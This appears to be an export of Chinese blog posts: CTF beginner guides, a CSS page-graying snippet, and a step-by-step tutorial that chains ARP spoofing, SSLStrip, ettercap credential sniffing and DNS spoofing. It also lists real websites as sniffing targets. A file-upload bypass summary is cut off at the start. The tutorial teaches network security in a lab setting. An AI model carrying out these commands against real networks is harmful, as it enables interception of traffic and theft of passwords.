<p>一堆密码学的题目:<a href="https://cryptopals.com/">https://cryptopals.com/</a></p>
<p>推荐书籍: 《深入浅出密码学——常用加密技术原理与应用》 《密码编码学与网络安全——原理与实践(第七版》 《图解密码技术》 《应用密码学:协议、算法与C源程序》</p>
<h2 id="3-Misc的详细入门指导"><a href="#3-Misc的详细入门指导" class="headerlink" title="3.Misc的详细入门指导"></a><a id="misc">3.Misc的详细入门指导</a></h2><p>杂项,简称Misc。杂项的内容很多很广,需要选手有较大的知识面以及快速学习新鲜事物的能力。 一般包括取证,隐写分析,编码转换,信息收集,流量分析等。有时密码学中的古典密码也被放到杂项里去。其中取证与隐写是misc最重要的一块。需要选手掌握各种花式隐写套路,需有较强的脚本功底,会用各类隐写工具。</p>
<p>隐写 <a href="https://www.jianshu.com/p/02fdd5edd9fc">https://www.jianshu.com/p/02fdd5edd9fc</a><br>流量分析 《Wireshark网络分析就这么简单》<br>ctf-wiki: <a href="https://ctf-wiki.github.io/ctf-wiki/misc/introduction-zh/">https://ctf-wiki.github.io/ctf-wiki/misc/introduction-zh/</a></p>
<h2 id="适合萌新刷题入门传送门"><a href="#适合萌新刷题入门传送门" class="headerlink" title="适合萌新刷题入门传送门"></a><a id="catch_flag">适合萌新刷题入门传送门</a></h2><ul>
<li><a href="https://adworld.xctf.org.cn/">攻防世界 有萌新区</a></li>
<li><a href="https://hack.lug.ustc.edu.cn/">2019中科大ctf新生赛</a></li>
<li><a href="https://cgctf.nuptsast.com/">南京邮电大学网络攻防平台 较多为简单题</a></li>
<li><a href="https://picoctf.com/">picoCTF2018和2019 美国面向高中生的ctf比赛</a></li>
<li><a href="https://github.com/ustclug/hackergame2018-writeups">2018中科大ctf新生赛 github存档</a></li>
</ul>
]]></content>
<categories>
<category>kali</category>
</categories>
<tags>
<tag>CTF</tag>
<tag>景衡杯</tag>
</tags>
</entry>
<entry>
<title>【景衡杯】2020极客先锋杯相关咨询</title>
<url>/2020/05/17/%E3%80%90%E6%99%AF%E8%A1%A1%E6%9D%AF%E3%80%912020%E6%9E%81%E5%AE%A2%E5%85%88%E9%94%8B%E6%9D%AF%E7%9B%B8%E5%85%B3%E5%92%A8%E8%AF%A2/</url>
<content><![CDATA[<h2 id="1-什么是CTF"><a href="#1-什么是CTF" class="headerlink" title="1.什么是CTF"></a>1.什么是CTF</h2><p>CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。</p>
<h2 id="2-入门CTF,你需要什么"><a href="#2-入门CTF,你需要什么" class="headerlink" title="2.入门CTF,你需要什么"></a>2.入门CTF,你需要什么</h2><ul>
<li><p>快速学习新事物的能力<br>一个不一样的思考方式<br>一颗乐于解决问题的心<br>一些有趣的网络安全技术<br>一段充实奋斗的时光</p>
</li>
<li><p>在这里,我们希望能给予你一些建议:</p>
<p>善用 Google 搜索可以帮助你更好地提升自己<br>掌握至少一门编程语言,比如 Python<br>实践比什么都要管用<br>保持对技术的好奇与渴望并坚持下去</p>
</li>
</ul>
<h2 id="3-CTF是怎么比赛的"><a href="#3-CTF是怎么比赛的" class="headerlink" title="3.CTF是怎么比赛的"></a>3.CTF是怎么比赛的</h2><p>由于 CTF 的考题范围其实比较宽广,目前也没有太明确的规定界限说会考哪些内容。但是就目前的比赛题型而言的话,主要还是依据常见的 Web 网络攻防、RE 逆向工程、Pwn 二进制漏洞利用、Crypto 密码攻击、Mobile 移动安全 以及 Misc 安全杂项 来进行分类。</p>
<h3 id="但本次比赛,只会涉及到-Web、Crypto和Misc哈"><a href="#但本次比赛,只会涉及到-Web、Crypto和Misc哈" class="headerlink" title="但本次比赛,只会涉及到 Web、Crypto和Misc哈"></a>但本次比赛,只会涉及到 Web、Crypto和Misc哈</h3><h3 id="Web-网络攻防"><a href="#Web-网络攻防" class="headerlink" title="Web - 网络攻防"></a>Web - 网络攻防</h3><p>主要为 Web 安全中常见的漏洞,如 SQL 注入、XSS、CSRF、文件包含、文件上传、代码审计、PHP 弱类型等,Web 安全中常见的题型及解题思路,并提供了一些常用的工具。</p>
<h3 id="Crypto-密码攻击"><a href="#Crypto-密码攻击" class="headerlink" title="Crypto - 密码攻击"></a>Crypto - 密码攻击</h3><p>主要包括古典密码学和现代密码学两部分内容,古典密码学趣味性强,种类繁多,现代密码学安全性高,对算法理解的要求较高。</p>
<h3 id="Misc-安全杂项"><a href="#Misc-安全杂项" class="headerlink" title="Misc - 安全杂项"></a>Misc - 安全杂项</h3><p>以诸葛建伟翻译的《线上幽灵:世界头号黑客米特尼克自传》和一些典型 MISC 题为切入点,内容主要包括信息搜集、编码分析、取证分析、隐写分析等。</p>
<h3 id="4-web、Crypto和Misc的详细入门指导请戳我!"><a href="#4-web、Crypto和Misc的详细入门指导请戳我!" class="headerlink" title="4.web、Crypto和Misc的详细入门指导请戳我!"></a>4.<a href="https://glsakura.gitee.io/2020/05/17/%E3%80%90%E6%99%AF%E8%A1%A1%E6%9D%AF%E3%80%912020%E6%9E%81%E5%AE%A2%E5%85%88%E9%94%8B%E6%9D%AF%E5%85%A5%E9%97%A8%E6%8C%87%E5%AF%BC/">web、Crypto和Misc的详细入门指导请戳我!</a></h3><h2 id="5-总结"><a href="#5-总结" class="headerlink" title="5.总结"></a>5.总结</h2><p>CTF可能门槛比较高,但是入门之后你会发现其乐趣 在学习过程中遇到挫折不要轻易放弃,建议先谷歌查找相关资料,实在查不到再求助他人。 关于如何提问,建议阅读这篇文章:<a href="https://github.com/ryanhanwu/How-To-Ask-Questions-The-Smart-Way/blob/master/README-zh_CN.md">提问的智慧</a></p>
<p>有任何问题欢迎到群里或联系协会成员。</p>
<h2 id="补充"><a href="#补充" class="headerlink" title="补充"></a>补充</h2><ul>
<li>Q: 要是我技术不好或者基础不太好怎么办?你们会教吗?</li>
<li>A: 不用担心,我们会根据你们大部分人的基础,给予你们相关资料和并根据本次比赛有针对性的培训。不用担心自己什么都不会,一开始谁都是小白。</li>
</ul>
<h3 id="再次提醒:本次比赛,只会涉及到-Web、Crypto和Misc哈"><a href="#再次提醒:本次比赛,只会涉及到-Web、Crypto和Misc哈" class="headerlink" title="再次提醒:本次比赛,只会涉及到 Web、Crypto和Misc哈"></a>再次提醒:本次比赛,只会涉及到 Web、Crypto和Misc哈</h3>]]></content>
<categories>
<category>CTF</category>
</categories>
<tags>
<tag>CTF</tag>
<tag>景衡杯</tag>
</tags>
</entry>
<entry>
<title>哀悼日网站全站变灰CSS代码</title>
<url>/2020/04/04/%E5%93%80%E6%82%BC%E6%97%A5%E7%BD%91%E7%AB%99%E5%85%A8%E7%AB%99%E5%8F%98%E7%81%B0CSS%E4%BB%A3%E7%A0%81/</url>
<content><![CDATA[<p>今天2020-04-04为了哀悼在抗击新冠肺炎斗争中的牺牲烈士和逝世同胞,不少相关站点都将网站全部变为灰色,以表示哀悼。</p>
<p>看下哔哩哔哩</p>
<p><img src="/img/%E5%93%80%E6%82%BC%E6%97%A5%E7%BD%91%E7%AB%99%E5%85%A8%E7%AB%99%E5%8F%98%E7%81%B0CSS%E4%BB%A3%E7%A0%81/image-20200404002945393.png" alt="image-20200404002945393"></p>
<p>这种效果是用纯CSS来实现的。</p>
<h2 id="全站变灰代码"><a href="#全站变灰代码" class="headerlink" title="全站变灰代码"></a>全站变灰代码</h2><p>如果你想全站变灰,代码如下</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">*{</span><br><span class="line"> filter: grayscale(100%);</span><br><span class="line"> -webkit-filter: grayscale(100%);</span><br><span class="line"> -moz-filter: grayscale(100%);</span><br><span class="line"> -ms-filter: grayscale(100%);</span><br><span class="line"> -o-filter: grayscale(100%);</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>如果你想只对于网站图片来实现灰度,代码如下</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">img{</span><br><span class="line"> filter: grayscale(100%);</span><br><span class="line"> -webkit-filter: grayscale(100%);</span><br><span class="line"> -moz-filter: grayscale(100%);</span><br><span class="line"> -ms-filter: grayscale(100%);</span><br><span class="line"> -o-filter: grayscale(100%);</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>如果只想针对部分图片,代码如下</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">/*这段代码只会对于class位grey的图片*/</span><br><span class="line">img.grey{</span><br><span class="line"> filter: grayscale(100%);</span><br><span class="line"> -webkit-filter: grayscale(100%);</span><br><span class="line"> -moz-filter: grayscale(100%);</span><br><span class="line"> -ms-filter: grayscale(100%);</span><br><span class="line"> -o-filter: grayscale(100%);</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>这是互联网行业的哀悼方式。</p>
<p>4月4日,愿逝者安息,愿生者奋发,愿祖国昌盛。</p>
<h2 id="如何关掉b站的变灰效果"><a href="#如何关掉b站的变灰效果" class="headerlink" title="如何关掉b站的变灰效果"></a>如何关掉b站的变灰效果</h2><p><img src="/img/%E5%93%80%E6%82%BC%E6%97%A5%E7%BD%91%E7%AB%99%E5%85%A8%E7%AB%99%E5%8F%98%E7%81%B0CSS%E4%BB%A3%E7%A0%81/image-20200404003909614.png" alt="image-20200404003909614"></p>
<p>打开控制台,搜索<code>filter</code>,找到这样一行css代码,关掉就变成彩色了,代码如下</p>
<p><code>-webkit-filter: grayscale(.95);</code></p>
<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2><p><a href="https://segmentfault.com/a/1190000007781619">哀悼日网站全站变灰CSS代码</a></p>
<p><a href="https://juejin.im/post/5df3a049f265da33f8652882">b站全灰,原来仅需一行css代码——css 滤镜</a></p>
]]></content>
<categories>
<category>前端</category>
</categories>
<tags>
<tag>css</tag>
<tag>灰色</tag>
<tag>网站</tag>
</tags>
</entry>
<entry>
<title>如何进行一次完整的 SSLStrip 攻击</title>
<url>/2020/04/02/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/</url>
<content><![CDATA[<h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>本文将介绍在局域网内,如何监听受害者流量并通过SSLstrip攻击获取敏感信息,分为如下两步:</p>
<ol>
<li>中间人攻击,监听受害者流量</li>
<li>SSLStrip攻击,获取敏感信息</li>
</ol>
<h2 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>实验环境</h2><table>
<thead>
<tr>
<th></th>
<th>IP地址</th>
<th align="left">MAC地址</th>
</tr>
</thead>
<tbody><tr>
<td>win10</td>
<td>192.168.40.1</td>
<td align="left">00:50:56:C0:00:08</td>
</tr>
<tr>
<td>网关</td>
<td>192.168.40.2</td>
<td align="left">00:50:56:E7:9F:31</td>
</tr>
<tr>
<td>kali</td>
<td>192.168.40.128</td>
<td align="left">00:0c:29:d8:d4:05</td>
</tr>
<tr>
<td>win7</td>
<td>192.168.40.130</td>
<td align="left">00:0C:29:C9:34:A6</td>
</tr>
<tr>
<td>centos7</td>
<td>192.168.40.132</td>
<td align="left">00:0c:29:bd:ef:65</td>
</tr>
</tbody></table>
<p>kali:<a href="http://mirrors.aliyun.com/kali-images/kali-2020.1b/kali-linux-2020.1b-live-amd64.iso">kali-linux-2020.1b-live-amd64.iso</a></p>
<p>win7:<a href="http://d0.ananas.chaoxing.com/download/16169a8dcb8f0e07b98d19c870b10ce3?fn=WIN7lite(x64)">win7</a></p>
<p>纯净虚拟机系统,使用VMware或者VirtualBox导入镜像即可。<br>采用Win7SP1镜像制作,极限精简,无多余组件,非常纯净,使用流畅,系统已激活。</p>
<h2 id="中间人攻击"><a href="#中间人攻击" class="headerlink" title="中间人攻击"></a>中间人攻击</h2><p>中间人攻击(<a href="http://man.linuxde.net/man">man</a>-in-the-Middle Attack, MITM),就是攻击者扮演中间人进行攻击,可以劫持一段会话,窃取凭证和其他机密信息。简而言之,所谓的MITM攻击就是通过拦截正常的网络通信数据,并进行数据篡改和嗅探,而通信的双方却毫不知情。</p>
<h3 id="ARP-(地址解析协议)"><a href="#ARP-(地址解析协议)" class="headerlink" title="ARP (地址解析协议)"></a>ARP (地址解析协议)</h3><p>ARP 协议负责通过 IP 地址找到 MAC 地址(物理地址 ),在以太网中,是利用 MAC 地址来通讯的。</p>
<p>ARP协议是这样工作的:如win10需要给win7(IP为192.168.40.130)发送数据,为了知道谁是win7,首先win10发送一个广播包给网内所有机器“谁是192.168.40.130”,正常情况其他机器忽略该消息,仅win7回复“我是192.168.40.130”,于是通信就可以开始。所有的主机维护他们自己的ARP缓存表,所以不会每一次都发送广播,ARP表中包含IP对应的MAC地址。</p>
<h4 id="如何进行ARP欺骗"><a href="#如何进行ARP欺骗" class="headerlink" title="如何进行ARP欺骗?"></a>如何进行ARP欺骗?</h4><p>例如kali需要对win7进行arp欺骗,那他就不再忽略win10发送的消息,他也会大量的发送数据包回复“啊啊啊!我才是192.168.40.130”,然后win10就会错误地建立或者更新了自己ARP表。然后win10发送数据时都发到kali那去了。</p>
<h3 id="攻击准备"><a href="#攻击准备" class="headerlink" title="攻击准备"></a>攻击准备</h3><h4 id="mac-下准备"><a href="#mac-下准备" class="headerlink" title="mac 下准备"></a>mac 下准备</h4><ol>
<li>安装 macports <a href="https://link.jianshu.com/?t=https://www.macports.org/install.php">官网</a></li>
<li>更新 macports <code>sudo port -d selfupdate</code></li>
<li>安装 dsniff(包含 arp 攻击的工具)<code>sudo port install dsniff</code></li>
<li>安装 nmap <code>brew install nmap</code> (如果没有安装 Homebrew,可以去 <a href="https://link.jianshu.com/?t=http://brew.sh/">Homebrew 官网</a></li>
</ol>
<h4 id="linux-下准备"><a href="#linux-下准备" class="headerlink" title="linux 下准备"></a>linux 下准备</h4><ol>
<li>安装 dsniff <code>apt-get install -y dsniff</code></li>
<li>安装 nmap <code>apt-get install -y nmap</code></li>
</ol>
<h3 id="攻击步骤"><a href="#攻击步骤" class="headerlink" title="攻击步骤"></a>攻击步骤</h3><p>一、寻找目标</p>
<p>使用nmap命令扫描局域网,获得主机列表<br> 如果所在局域网路由器地址是 192.168.40.1,可以使用 <code>nmap -sP 192.168.40.1/24</code> 扫描</p>
<p>-sP 表示使用 ping 方式扫描,192.168.40.1/24”表示扫描”192.168.40.1-192.168.40.254”这个网段的所有机器。</p>
<p>二、开启 IP 转发</p>
<p>ARP欺骗一般目的是把自己伪装成网关,但如果不作处理,当被欺骗数据包到达后就会被本机丢弃(因为本机不是网关,不知道如何处理这类数据包),这会导致没有数据包返回给被欺骗主机,导致断网。这当然是不允许的。开启IP转发功能可以解决该问题。IP转发负责把该类数据包再转发给真正的网关处理,开启IP转发的方法。</p>
<p>mac 下:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">sysctl -w net.inet.ip.forwarding=1</span><br></pre></td></tr></table></figure>
<p>linux 下:</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">echo 1 >/proc/sys/net/ipv4/ip_forward</span><br></pre></td></tr></table></figure>
<p>三、ARP 欺骗</p>
<p>假设被攻击的 IP 是 192.168.40.130,局域网的网关是 192.168.40.2,攻击电脑使用的网卡接口是 eth0(可以使用 <code>ifconfig</code> 命令查看), 则欺骗命令如下:</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">arpspoof -i eth0 -t 192.168.40.130 192.168.40.2</span><br></pre></td></tr></table></figure>
<blockquote>
<p>arpspoof是dsniff的一个组件,主要用于进行arp欺骗使用</p>
</blockquote>
<p>成功的的话在被攻击主机上arp表如图所示</p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/image-20200402181122459.png" alt="image-20200402181122459"></p>
<blockquote>
<p>查询查询系统中缓存的ARP表<code>arp -a</code></p>
</blockquote>
<p>四、分析数据</p>
<p>如果 ARP 欺骗成功,则被攻击的设备会把所有数据先传到我们电脑上,接下来可以使用 ettercap 软件来分析数据。</p>
<h3 id="使用driftnet获取图片"><a href="#使用driftnet获取图片" class="headerlink" title="使用driftnet获取图片"></a>使用driftnet获取图片</h3><p>安装driftnet<code>apt-get install driftnet</code></p>
<p>开始获取<code>driftnet -i eth0</code></p>
<p>找一个http的网站进行测试</p>
<p><code>inurl:“http” -https</code></p>
<p>例子:<code>http://www.kan-tv.com/</code></p>
<p>Tips:https因为进行了加密不能直接获取,进行SSLStrip攻击后就可获取了</p>
<h2 id="SSLStrip-攻击"><a href="#SSLStrip-攻击" class="headerlink" title="SSLStrip 攻击"></a>SSLStrip 攻击</h2><p>2009年的黑帽大会上,一个名叫Moxie Marlinspike的研究人员,发布了一个叫sslstrip的工具。通过该工具,可以实现对ssl进行中间人攻击。</p>
<p>SSLstrip 也叫 https 降级攻击,攻击者拦截用户流量后,欺骗用户与攻击者进行 http 通信,攻击者与服务器保持正常通信 (http 或 https),从而获取用户信息。</p>
<h3 id="攻击原理"><a href="#攻击原理" class="headerlink" title="攻击原理"></a>攻击原理</h3><p>攻击者利用用户对于地址栏中HTTPS与HTTP的疏忽,将所有的HTTPS连接都用HTTP来代替。同时,与目标服务器建立正常的HTTPS连接。由于HTTP通信是没有经过加密传输的,并没有HTTPS安全,所以攻击者能轻松实施嗅探。</p>
<ol>
<li>通过中间人攻击监听 http 流量</li>
<li>更改重定向链接中的 location,替换 https 为 http,并记录</li>
<li>更改响应内容中的超链接,替换 https 为 http,并记录</li>
<li>与用户进行 http 通信,与服务器进行 https 通信(记录中本应是 https 的请求),从而明文获取用户信息</li>
</ol>
<p>Tips:</p>
<p>当用户浏览的网页中包含https协议,会被转化为http协议的请求</p>
<p>但是sslstrip也不是万能的, 假如网页中没有https, 但是js代码绑定了跳转到https的协议请求的事件,那么sslstrip就失效了</p>
<h3 id="攻击准备-1"><a href="#攻击准备-1" class="headerlink" title="攻击准备"></a>攻击准备</h3><ol>
<li><p>监听 http 流量</p>
</li>
<li><p>获取 <a href="https://moxie.org/software/sslstrip/">sslstrip工具</a></p>
<p>Requirements<br>Python >= 2.5 (apt-get install python)<br>The python “twisted-web” module (apt-get install python-twisted-web)</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">apt-get -y install python python-twisted-web</span><br><span class="line">git clone https://github.com/moxie0/sslstrip.git</span><br><span class="line">cd sslstrip && python ./setup.py install</span><br></pre></td></tr></table></figure></li>
</ol>
<h3 id="攻击步骤-1"><a href="#攻击步骤-1" class="headerlink" title="攻击步骤"></a>攻击步骤</h3><p>一、开启内核转发功能保证攻击过程中被攻击者不断网</p>
<p>临时ip转发</p>
<p><code>echo 1 > /proc/sys/net/ipv4/ip_forward</code></p>
<p>永久ip转发</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">vim /etc/sysctl.conf</span><br><span class="line">net.ipv4.ip_forward = 1 //修改值</span><br><span class="line">sysctl -p /etc/sysctl.conf //使修改生效</span><br></pre></td></tr></table></figure>
<p>二、把流量导入到 sslstrip 程序</p>
<p>设置iptables以将HTTP通信重定向到sslstrip。<br> 输入命令: <code>iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000</code><br> 其中最后面的端口号(比如上面的 10000)就是 sslstrip 程序监听的端口号</p>
<blockquote>
<h4 id="iptables命令使用详解"><a href="#iptables命令使用详解" class="headerlink" title="iptables命令使用详解"></a>iptables命令使用详解</h4><p>iptables的主要功能是实现对网络数据包进出设备及转发的控制。当数据包需要进入设备、从设备中流出或者经该设备转发、路由时,都可以使用iptables进行控制。</p>
<p>-t:命令要操作匹配的表(net这个表表示被查询时遇到了新差生的连接包)</p>
<p>Net表有三个内建的链构成 PREROUTING(修改到来的包)、OUTPUT(修改路由之前本地的包)、POSTROUTING(修改准备出去的包)</p>
<p>-A表示在选择的链后加入更多选项</p>
<p>–p指被过滤包的协议</p>
<p>–destination-port 80指被过滤包的目的端口是80</p>
<p>-j REDIRECT –to-port 10000 将80端口的数据跳转到指定端口传输</p>
</blockquote>
<p>如果攻击完成后要删除这条记录可以输入命令 <code>iptables -t nat -D PREROUTING 1</code></p>
<p>查看 ip 转发表: <code>iptables -t nat -L</code></p>
<p>三、运行arpspoof以说服网络他们应该将流量发送给你。</p>
<p><code>arpspoof -i eth0 -t 192.168.40.130 192.168.40.2</code></p>
<blockquote>
<p>arpspoof -i 网卡 -t 目标IP 网关 </p>
</blockquote>
<p>四、启动sslstrip</p>
<p><code>sslstrip -l 10000</code></p>
<blockquote>
<p>-w <文件名>,–write = <文件名>指定要登录的文件(可选)。<br>-p,–post仅记录SSL POST。(默认)<br>-s,–ssl记录往返服务器的所有SSL流量。<br>-a,–all记录往返服务器的所有SSL和HTTP通信。<br>-l <端口>,–listen = <端口>用于侦听的端口(默认为10000)。<br>-f,–favicon根据安全请求替换锁图标。<br>-k,–killsessions终止正在进行的会话。<br>-h 打印此帮助消息。</p>
<p>查看端口占用<code>lsof -i tcp:10000</code></p>
<p><code>sslstrip -a -k -f -l 10000</code></p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/image-20200402191100289.png" alt="image-20200402191100289"></p>
<p>可以看到,网页上没有任何不安全的警告或是提示,只是原先的HTTPS连接已经被HTTP连接所替换,并且为增加迷惑性,网页的图标被修改成了一个银色的锁图案。但是,假的毕竟是假的,一方面无法查看到任何证书的信息,另外如果在网址前输入https://,则网页无法发开。因此,sslstrip并不是万能的攻击方法。</p>
</blockquote>
<h3 id="使用ettercap对目标主机进行arp攻击,并且开始嗅探密码。"><a href="#使用ettercap对目标主机进行arp攻击,并且开始嗅探密码。" class="headerlink" title="使用ettercap对目标主机进行arp攻击,并且开始嗅探密码。"></a>使用ettercap对目标主机进行arp攻击,并且开始嗅探密码。</h3><blockquote>
<p>终端界面嗅探密码<code>ettercap -Tq -i eth0</code></p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line">-P 使用插件</span><br><span class="line">-T 使用基于文本界面</span><br><span class="line">-q 启动安静模式(不回显)</span><br><span class="line">-M 启动ARP欺骗攻击</span><br></pre></td></tr></table></figure>
</blockquote>
<p>我们使用ettercap的GTK+ GUI图像界面<code>ettercap -G</code></p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/006DGX4tly1forn6xo9ynj30me0ehtaf.jpg" alt="1"></p>
<p>选择Sniff—-Unified-sniffing,然后选择网卡:eth0(我这里是eth0,大家根据情况选择)。</p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/1579317-20190505005253674-1007015553.png" alt="img"></p>
<p>然后Hosts——Scan for hosts——Hosts list</p>
<p>我们的目标主机ip(192.168.40.130)选定目标主机,然后点add to target 1,将目标主机添加到目标;选定路由,点add to target 2,将路由添加到目标2</p>
<p>添加成功后,点击Mitm——ARP posoning ,勾选sniff remote connections。</p>
<p>之后start——start sniffing开始监听。</p>
<p>点击view——connections查看被攻击机访问的IP,端口,协议,发送和接收的数据包大小。</p>
<p>点击view——profiles查看被攻击机访问的链接。在下方可以查看更清晰的链接访问情况。</p>
<p>当然你也可以通过双击链接来查看profiles details,即访问网站的具体情况。</p>
<p>在这里,如果被攻击机输入密码登陆某一网站,我们可以检测到登陆的用户名及其密码。</p>
<p>这是刚刚检测到的一个用户名和登陆密码。这个网站完全没有对密码进行加密操作,出来的结果也是明文显示的。<br><a href="http://ww1.sinaimg.cn/large/006DGX4tly1forn7tt3plj306h00g3ya.jpg"><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/006DGX4tly1forn7tt3plj306h00g3ya.jpg" alt="3"></a></p>
<p>这是另外一个站检测出来的,对密码进行了加密。<br><a href="http://ww1.sinaimg.cn/large/006DGX4tly1forn8hy09dj30l2015747.jpg"><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/006DGX4tly1forn8hy09dj30l2015747.jpg" alt="4"></a></p>
<p>Tips:其实一个网站如果使用的都是https协议,那么安全性一般做的比较好,数据进行了加密的,也就是说你即使已经把https降低为http,即使捕获到了密码,你也不可能轻易解密的出来。</p>
<h4 id="测试网址"><a href="#测试网址" class="headerlink" title="测试网址"></a>测试网址</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">http://www.freemojo.com //http密码明文未加密</span><br><span class="line">http://bbs.ylnet.com.cn/forum.php //http密码加密了</span><br><span class="line">http://www.discuz.net/forum.php //https密码未加密</span><br></pre></td></tr></table></figure>
<h3 id="Dns欺骗"><a href="#Dns欺骗" class="headerlink" title="Dns欺骗"></a>Dns欺骗</h3><p><code>leafpad /etc/ettercap/etter.dns</code></p>
<p>在微软处添加:</p>
<p>`<a href="http://www.baidu.com/">www.baidu.com</a> A 192.168.40.132</p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/image-20200402231357902.png" alt="image-20200402231357902"></p>
<p>ettercap -G(进入图形界面)</p>
<p>重复之前的步骤ARP欺骗的步骤,在start sniffing之前添加一个插件</p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/1579317-20190505005436537-613190724.png" alt="img"></p>
<p>双击启动dns_spoof</p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/1579317-20190505005442442-1221575293.png" alt="img"></p>
<p>开始嗅探后,我们在目标机中ping一下百度</p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/image-20200402231259745.png" alt="image-20200402231259745"></p>
<p>欺骗成功,如果将192.168.40.132改为钓鱼页面,就可以欺骗到用户账号密码</p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/image-20200402231157009.png" alt="image-20200402231157009"></p>
<p>最后提醒大家,连接公共wifi时一定要小心!</p>
<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2><p> <a href="https://www.jianshu.com/p/983d43b4ba1e">如何进行一次完整的 SSLStrip</a></p>
<p><a href="https://www.cnblogs.com/paperpen/p/10810690.html">ARP欺骗之ettercap图形化界面</a></p>
<p><a href="https://www.jianshu.com/p/bbf50dace855">APR攻击(Arpspoof)</a></p>
<p><a href="https://blog.csdn.net/li_101357/article/details/78416813">linux ip 转发设置 ip_forward、ip_forward与路由转发</a></p>
<p><a href="https://blog.csdn.net/kuiguowei/article/details/79070945">HTTP&HTTPS账号密码获取与ettercap局域网内DNS欺骗</a></p>
<p><a href="https://www.bingyublog.com/2018/02/23/%E4%BD%BF%E7%94%A8ssltrip%E7%AA%81%E7%A0%B4ssl%E5%8A%A0%E5%AF%86%E6%88%AA%E8%8E%B7%E5%AF%86%E7%A0%81/">使用ssltrip突破ssl加密截获密码</a></p>
<p><a href="https://moxie.org/software/sslstrip/">sslstrip</a></p>
<p><a href="https://www.freebuf.com/articles/web/5929.html">利用sslstrip和ettercap突破ssl嗅探密码</a></p>
<p><a href="https://www.linuxde.net/2011/11/2522.html">针对SSL的中间人攻击演示和防范</a></p>
<p><a href="https://tools.kali.org/information-gathering/sslstrip">sslstrip Package Description</a></p>
]]></content>
<categories>
<category>kali</category>
</categories>
<tags>
<tag>SSLstrip</tag>
<tag>ARP</tag>
<tag>kali</tag>
</tags>
</entry>
<entry>
<title>文件上传利用绕过方式总结</title>
<url>/2020/08/04/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%A9%E7%94%A8%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/</url>
<content><![CDATA[<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%A9%E7%94%A8%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/1582510679-150193-upload1.png" alt="img"></p>
<hr>
<ol>
<li><strong>前端验证</strong><br>1.1 修改前端 javascript 文件将限制代码去掉<br>1.2 传参过程中抓包修改后缀<br>1.3 前端禁用 javascript 脚本</li>
